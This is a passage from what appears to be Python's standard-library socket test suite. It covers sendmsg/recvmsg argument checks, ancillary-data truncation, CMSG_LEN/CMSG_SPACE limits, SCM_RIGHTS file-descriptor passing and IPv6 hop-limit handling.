[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
with self.assertRaises(socket.timeout):
while True:
self.sendmsgToServer([b"a"*512])
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general the flag is
# only honored when receiving.  Other platforms could be added here if
# they are known to support it for sending too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
# FreeBSD < 8 doesn't always set the MSG_TRUNC flag when a truncated
# datagram is received (issue #13001).
@support.requires_freebsd_version(8)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
@support.requires_freebsd_version(8)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
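# As a concrete (platform-dependent) illustration only: on a typical
# 64-bit Linux build CMSG_LEN(0) is 16, so CMSG_LEN(4) is 20 while
# CMSG_SPACE(4) rounds up to 24 to leave room for trailing padding.  The
# exact numbers vary by platform; the tests below only rely on
# CMSG_LEN(n) == CMSG_LEN(0) + n and CMSG_SPACE(n) >= CMSG_LEN(n).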
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
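# The FD-passing pattern exercised throughout this class: the sender
# packs descriptors into an array("i") and ships them as a single
# (SOL_SOCKET, SCM_RIGHTS, fds) control message alongside MSG, while the
# receiver extracts the integers from cmsg_data with array.frombytes()
# and closes them again in closeRecvmsgFDs().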
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
